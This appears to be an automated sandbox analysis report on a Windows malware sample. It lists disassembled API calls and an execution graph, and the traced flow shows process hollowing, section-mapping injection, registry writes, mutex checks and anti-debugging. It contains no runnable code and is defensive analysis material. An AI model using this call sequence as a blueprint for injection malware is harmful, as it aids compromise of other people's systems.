      • Part of subcall function 0040F6F4: GetClipboardSequenceNumber.USER32 ref: 0040F766
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F7B8
      • Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F7BB
      • Part of subcall function 0040F6F4: GetShellWindow.USER32 ref: 0040F7CF
      • Part of subcall function 0040F6F4: GetModuleHandleA.KERNEL32(00000000,?), ref: 0040F800
      • Part of subcall function 0040F6F4: GetProcAddress.KERNEL32(00000000), ref: 0040F807
      • Part of subcall function 0040F6F4: NtMapViewOfSection.NTDLL(?,?,4B475735,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 0040F827
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F835
      • Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F842
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F847
      • Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F84E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
      • Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641
    • _strcspn.LIBCMT ref: 00426D23
    • _strcspn.LIBCMT ref: 00426DB5
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00421317,0000000D), ref: 00423EDD
    • InterlockedDecrement.KERNEL32(?), ref: 004214B2
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422228
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422235
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422242
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042224F
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042225C
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422278
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(00000000), ref: 00422288
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042229E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD
    • InterlockedDecrement.KERNEL32(?), ref: 004214B2
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
      • Part of subcall function 0041F790: __fltout2.LIBCMT ref: 0041F7BF
    • __fltout2.LIBCMT ref: 0041FE19
      • Part of subcall function 004237BF: ___dtold.LIBCMT ref: 004237E5
      • Part of subcall function 004237BF: _$I10_OUTPUT.LIBCMT ref: 00423800
      • Part of subcall function 00423659: _strlen.LIBCMT ref: 004236F4
    • __cftof2_l.LIBCMT ref: 0041FEA6
      • Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FC8B
      • Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FCAF
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 0041F790: __fltout2.LIBCMT ref: 0041F7BF
    • __fltout2.LIBCMT ref: 0041FE19
      • Part of subcall function 004237BF: ___dtold.LIBCMT ref: 004237E5
      • Part of subcall function 00423659: _strlen.LIBCMT ref: 004236F4
    • __cftof2_l.LIBCMT ref: 0041FEA6
      • Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FC8B
      • Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FCAF
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042784C
      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
      • Part of subcall function 0042243F: __getptd.LIBCMT ref: 0042244B
      • Part of subcall function 0042243F: __getptd.LIBCMT ref: 00422462
      • Part of subcall function 0042243F: __amsg_exit.LIBCMT ref: 00422470
      • Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD
    • __copytlocinfo_nolock.LIBCMT ref: 00427890
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • __fltout2.LIBCMT ref: 0041F7BF
      • Part of subcall function 004237BF: ___dtold.LIBCMT ref: 004237E5
      • Part of subcall function 004237BF: _$I10_OUTPUT.LIBCMT ref: 00423800
      • Part of subcall function 00423659: _strlen.LIBCMT ref: 004236F4
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • __fltout2.LIBCMT ref: 0041FD3B
      • Part of subcall function 004237BF: ___dtold.LIBCMT ref: 004237E5
      • Part of subcall function 004237BF: _$I10_OUTPUT.LIBCMT ref: 00423800
      • Part of subcall function 00423659: _strlen.LIBCMT ref: 004236F4
    • __cftof2_l.LIBCMT ref: 0041FDBA
      • Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FC8B
      • Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FCAF
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • __fltout2.LIBCMT ref: 0041FD3B
      • Part of subcall function 004237BF: ___dtold.LIBCMT ref: 004237E5
      • Part of subcall function 00423659: _strlen.LIBCMT ref: 004236F4
    • __cftof2_l.LIBCMT ref: 0041FDBA
      • Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FC8B
      • Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FCAF
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00421317,0000000D), ref: 00423EDD
    • InterlockedDecrement.KERNEL32(00000000), ref: 00426B1F
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422228
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422235
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422242
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042224F
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042225C
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422278
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(00000000), ref: 00422288
      • Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042229E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD
    • InterlockedDecrement.KERNEL32(00000000), ref: 00426B1F
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • PathFindFileNameW.SHLWAPI(76E645DF,00000000,76E6FE8D,?,?,?,?,?,?,KCBqiNhR7x,0040F429), ref: 0040B8D9
      • Part of subcall function 0040E60D: lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0040E625
      • Part of subcall function 0040E60D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0040E634
      • Part of subcall function 0040E60D: HeapAlloc.KERNEL32(00000000), ref: 0040E63B
      • Part of subcall function 0040E60D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0040E654
      • Part of subcall function 0040E60D: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E66D
      • Part of subcall function 0040E60D: HeapFree.KERNEL32(00000000), ref: 0040E674
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • RtlDecodePointer.NTDLL(004327D8), ref: 004212A1
    • TlsFree.KERNEL32(004327DC,00421733,?,0041F2CB), ref: 004212BB
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76E6C570,0040D305,00000000,?,00000000,00000000), ref: 004047F4
    • HeapFree.KERNEL32(00000000), ref: 004047F7
    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,76E6C570,0040D305,00000000,?,00000000,00000000), ref: 00404801
    • HeapAlloc.KERNEL32(00000000), ref: 00404804
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd

    Execution Graph

    Execution Coverage:5%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:11.2%
    Total number of Nodes:1524
    Total number of Limit Nodes:14

    Graph

    %3 4268 66f1e 4269 66f51 4268->4269 4270 66fcb 4268->4270 4272 66fe2 4269->4272 4291 64ab4 OpenProcess 4269->4291 4270->4272 4275 67044 lstrlenA 4270->4275 4276 67015 OpenProcess 4270->4276 4286 6706d 4270->4286 4274 64ab4 13 API calls 4282 6707b 4274->4282 4279 67057 lstrlenA 4275->4279 4275->4286 4276->4275 4278 6702a GetProcessImageFileNameA CloseHandle 4276->4278 4277 6485c 27 API calls 4280 66f7d 4277->4280 4278->4275 4283 6e545 5 API calls 4279->4283 4280->4272 4281 66f85 FindAtomW 4280->4281 4281->4272 4284 66f9b AddAtomW GetProcessHeap HeapAlloc 4281->4284 4282->4272 4285 6485c 27 API calls 4282->4285 4283->4286 4287 670bd CreateThread CloseHandle 4284->4287 4288 6709b 4285->4288 4286->4272 4286->4274 4287->4272 4288->4272 4289 6709f StrCmpIW 4288->4289 4289->4272 4290 670b5 4289->4290 4290->4287 4292 64b10 GetProcessTimes 4291->4292 4293 64c13 4291->4293 4294 64c0a CloseHandle 4292->4294 4295 64b2f GetProcessHeap HeapAlloc 4292->4295 4293->4272 4293->4277 4294->4293 4296 64b70 GetForegroundWindow 4295->4296 4297 64b7d 4296->4297 4297->4296 4298 64b9c wsprintfA FindAtomA 4297->4298 4299 64bfa GetProcessHeap HeapFree 4298->4299 4300 64bcb GlobalFindAtomA 4298->4300 4299->4294 4300->4299 4301 64bdd GlobalAddAtomA AddAtomA 4300->4301 4301->4299 4302 670d8 GetProcessHeap HeapAlloc 4303 671a5 RevertToSelf 4302->4303 4304 671b2 4303->4304 4304->4303 4305 671ca GetProcessHeap HeapAlloc 4304->4305 4306 67203 GetCurrentProcessId 4305->4306 4307 67210 4306->4307 4307->4306 4308 67228 4307->4308 4309 6722d wsprintfA RegOpenKeyA 4308->4309 4311 67287 Sleep 4308->4311 4309->4308 4310 6725d RegSetValueExA RegCloseKey 4309->4310 4310->4308 4311->4308 2950 6efb9 SetErrorMode SetErrorMode GetProcessHeap HeapAlloc 2951 6f024 GetCapture 2950->2951 2952 6f031 2951->2952 2952->2951 2953 6f049 GetProcessHeap HeapAlloc 2952->2953 2954 6f09f GetFocus 2953->2954 2955 6f0ac 2954->2955 2955->2954 2956 6f0c4 LoadLibraryA GetProcAddress GetCommandLineW 2955->2956 2957 6f0e8 GetProcessHeap RtlAllocateHeap GetModuleFileNameW GetProcessHeap HeapAlloc 2956->2957 2958 6f17b IsSystemResumeAutomatic 2957->2958 2959 6f188 2958->2959 2959->2958 2960 6f1a0 GetProcessHeap 2959->2960 2961 6f1b5 GetModuleHandleW 2960->2961 2962 6f1cf 2960->2962 3060 69c2e GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 2961->3060 2997 6ef8b VirtualQuery 2962->2997 2965 6f1c7 ExitProcess 2966 6f1e8 2998 61c80 2966->2998 2971 6f20c 3084 6a0ee GetProcessHeap HeapAlloc 2971->3084 2972 6f21f GetProcessHeap HeapAlloc 2974 6f2eb GetActiveWindow 2972->2974 2976 6f2f8 2974->2976 2975 6f211 GetProcessHeap HeapFree 2975->2965 2976->2974 2977 6f310 GetProcessHeap HeapAlloc 2976->2977 2978 6f38b GetModuleHandleW 2977->2978 2979 6f39a 2978->2979 2979->2978 2980 6f3b2 6 API calls 2979->2980 3018 6be1a GetProcessHeap HeapAlloc 2980->3018 2982 6f417 2983 6f43d StrStrIW 2982->2983 3025 6b71e 2982->3025 2985 6f453 StrStrIW 2983->2985 2986 6f469 2983->2986 2985->2986 2988 6f462 2985->2988 3129 6ee9b GetProcessHeap HeapAlloc 2986->3129 3029 619c7 2988->3029 2990 6f46e 6 API calls 2993 6f49f Sleep 2990->2993 3715 6c737 2990->3715 2993->2993 2994 6f42d 2994->2983 3108 6890f lstrlenW 2994->3108 2996 6f429 2996->2983 2996->2994 2997->2966 2999 61c9e 2998->2999 3000 61ca5 2998->3000 3005 6e897 OpenProcessToken 2999->3005 3000->2999 3001 61cc0 LoadLibraryA 3000->3001 3135 61c18 3000->3135 3001->2999 3002 61ccd GetModuleFileNameA 3001->3002 3002->3000 3003 61ceb GetModuleHandleExA 3002->3003 3003->3000 3006 6e8b4 GetTokenInformation 3005->3006 3007 6e960 GetVersion 3005->3007 3008 6e8d0 GetLastError 3006->3008 3009 6e954 CloseHandle 3006->3009 3007->2971 3007->2972 3008->3009 3010 6e8db GetProcessHeap HeapAlloc 3008->3010 3009->3007 3011 6e8f4 GetTokenInformation 3010->3011 3012 6e953 3010->3012 3013 6e90b GetSidSubAuthorityCount 3011->3013 3014 6e944 GetProcessHeap HeapFree 3011->3014 3012->3009 3013->3014 3015 6e917 3013->3015 3014->3012 3015->3014 3016 6e91d GetSidSubAuthority 3015->3016 3016->3014 3017 6e92e 3016->3017 3017->3014 3019 6be7c GetFocus 3018->3019 3020 6be89 3019->3020 3020->3019 3021 6bea8 GetEnvironmentVariableA 3020->3021 3022 6bee7 GetProcessHeap HeapFree 3021->3022 3023 6bec2 lstrlenA 3021->3023 3022->2982 3024 6bedc 3023->3024 3024->3022 3026 6b89a 3025->3026 3028 6b8c0 3026->3028 3139 6e0ef 3026->3139 3028->2994 3105 6b8ca PathFindFileNameW 3028->3105 3187 64521 GetModuleHandleW GetCurrentProcess OpenProcessToken 3029->3187 3032 6be1a 7 API calls 3033 619ff 3032->3033 3040 61a0d 3033->3040 3201 6c055 GetProcessHeap HeapAlloc 3033->3201 3036 61a08 3231 6a98b 3036->3231 3037 61a23 GetModuleHandleW 3357 6e6ed GetModuleHandleW GetVersion GetCurrentProcessId 3037->3357 3038 61a0f Sleep 3038->3040 3040->3037 3040->3038 3353 6b6b4 3040->3353 3044 61a74 VirtualProtect 3421 6474a 3044->3421 3045 61a39 3045->3044 3401 6bf00 3045->3401 3050 61aaf 3051 6fcd2 13 API calls 3050->3051 3052 61ab9 GlobalAddAtomW AddAtomW 3051->3052 3432 6d9f1 3052->3432 3055 61b08 3055->2994 3061 69d43 GetProcessHeap 3060->3061 3062 69d50 3061->3062 3062->3061 3063 69d69 ExpandEnvironmentStringsW lstrcatW lstrcatW lstrcatW lstrcatW 3062->3063 3064 69db0 CreateProcessW 3063->3064 3065 69dd1 GetProcessHeap HeapFree GetThreadContext 3064->3065 3066 69da5 Sleep 3064->3066 3067 69e13 3065->3067 3068 6a0af TerminateProcess CloseHandle CloseHandle 3065->3068 3066->3064 3670 6f995 GetProcessHeap HeapAlloc 3067->3670 3070 6a0cf GetProcessHeap HeapFree 3068->3070 3070->2965 3071 69e2a 3072 6a084 3071->3072 3685 6f6f4 GetProcessHeap HeapAlloc 3071->3685 3074 6a097 3072->3074 3695 6f859 GetProcessHeap HeapAlloc 3072->3695 3075 6a09e CloseHandle 3074->3075 3076 6a0a8 3074->3076 3075->3076 3076->3068 3076->3070 3078 69fc7 SetLastError ReadProcessMemory 3078->3072 3079 6a002 IsBadReadPtr IsBadReadPtr 3078->3079 3082 6a03e 3079->3082 3080 6a056 WriteProcessMemory 3081 6a07a ResumeThread 3080->3081 3080->3082 3081->3072 3082->3080 3082->3081 3083 69e45 3083->3072 3083->3074 3083->3078 3085 6a1c2 ReleaseCapture 3084->3085 3086 6a1cf 3085->3086 3086->3085 3087 6a1e7 ExpandEnvironmentStringsW GetShortPathNameW GetProcessHeap HeapAlloc 3086->3087 3088 6a272 GetForegroundWindow 3087->3088 3089 6a27f 3088->3089 3089->3088 3090 6a297 wsprintfW GetProcessHeap HeapAlloc 3089->3090 3091 6a300 RevertToSelf 3090->3091 3092 6a30d 3091->3092 3092->3091 3093 6a325 CoInitializeEx GetProcessHeap HeapAlloc 3092->3093 3094 6a3ac GetCapture 3093->3094 3095 6a3b9 3094->3095 3095->3094 3096 6a3d1 GetProcessHeap HeapAlloc 3095->3096 3097 6a422 GetDoubleClickTime 3096->3097 3098 6a42f 3097->3098 3098->3097 3099 6a447 LoadLibraryA GetProcAddress 3098->3099 3100 6a472 GetForegroundWindow 3099->3100 3101 6a487 3100->3101 3102 6a48b 12 API calls 3101->3102 3103 6a45d GetLastError 3101->3103 3102->2975 3103->3102 3104 6a46a Sleep 3103->3104 3104->3100 3106 6e60d 11 API calls 3105->3106 3107 6b8eb 3106->3107 3107->2996 3107->3107 3109 68ba8 3108->3109 3110 68932 GetProcessHeap HeapAlloc 3108->3110 3109->2994 3110->3109 3111 68957 GetProcessHeap HeapAlloc 3110->3111 3112 68977 lstrcpyW 3111->3112 3113 68b9c GetProcessHeap HeapFree 3111->3113 3713 64132 3112->3713 3113->3109 3116 689d2 GetClipboardOwner 3117 689df 3116->3117 3117->3116 3118 689fe GetTickCount wsprintfW wsprintfW GetProcessHeap HeapAlloc 3117->3118 3119 68b7f GetProcessHeap HeapFree GetProcessHeap HeapFree 3118->3119 3120 68a47 GetTickCount GetProcessHeap HeapAlloc 3118->3120 3119->3113 3121 68af7 GetClipboardSequenceNumber 3120->3121 3122 68b04 3121->3122 3122->3121 3123 68b23 wsprintfA 3122->3123 3124 6dd0b 32 API calls 3123->3124 3125 68b41 3124->3125 3126 68b5b GetProcessHeap HeapFree GetProcessHeap HeapFree 3125->3126 3127 68761 17 API calls 3125->3127 3126->3119 3128 68b58 3127->3128 3128->3126 3130 6ef23 GetForegroundWindow 3129->3130 3131 6ef30 3130->3131 3131->3130 3132 6ef4f OpenMutexW 3131->3132 3133 6ef68 CreateMutexW GetProcessHeap HeapFree 3132->3133 3134 6ef83 ExitProcess 3132->3134 3133->2990 3136 61c28 3135->3136 3137 61c2e 3136->3137 3138 61c61 GetProcAddress 3136->3138 3137->3000 3138->3136 3138->3137 3140 6e236 NtQuerySystemInformation 3139->3140 3141 6e117 GetProcessHeap HeapAlloc 3139->3141 3143 6e2e7 3140->3143 3144 6e24d VirtualAlloc 3140->3144 3142 6e155 GetShellWindow 3141->3142 3145 6e162 3142->3145 3143->3026 3144->3143 3146 6e270 NtQuerySystemInformation 3144->3146 3145->3142 3148 6e17a GetProcessHeap HeapAlloc 3145->3148 3147 6e288 3146->3147 3153 6e280 VirtualFree 3146->3153 3147->3153 3157 674d8 3147->3157 3150 6e1d4 ReleaseCapture 3148->3150 3151 6e1e1 3150->3151 3151->3150 3152 6e1f9 6 API calls 3151->3152 3152->3140 3153->3143 3156 6e2a9 3156->3147 3156->3153 3170 6e60d 3156->3170 3158 674f5 GetProcessHeap HeapAlloc 3157->3158 3159 67622 3157->3159 3160 67544 GetMessageTime 3158->3160 3161 67626 OpenProcess 3159->3161 3162 67653 3159->3162 3163 67551 3160->3163 3161->3162 3164 6763a IsWow64Process CloseHandle 3161->3164 3162->3156 3163->3160 3165 67570 GetProcessHeap HeapAlloc 3163->3165 3164->3162 3166 675b5 IsSystemResumeAutomatic 3165->3166 3167 675c2 3166->3167 3167->3166 3168 675e1 6 API calls 3167->3168 3168->3162 3169 6761f 3168->3169 3169->3159 3171 6e61f 3170->3171 3175 6e67a 3170->3175 3172 6e624 lstrlenW 3171->3172 3173 6e62d GetProcessHeap HeapAlloc 3171->3173 3172->3173 3174 6e647 WideCharToMultiByte 3173->3174 3173->3175 3174->3175 3176 6e65e 3174->3176 3175->3156 3179 6e545 3176->3179 3180 6e559 3179->3180 3183 6e5f6 GetProcessHeap HeapFree 3179->3183 3181 6e55e lstrlenA 3180->3181 3184 6e565 GetProcessHeap HeapAlloc 3180->3184 3181->3184 3183->3175 3184->3183 3185 6e5a1 3184->3185 3186 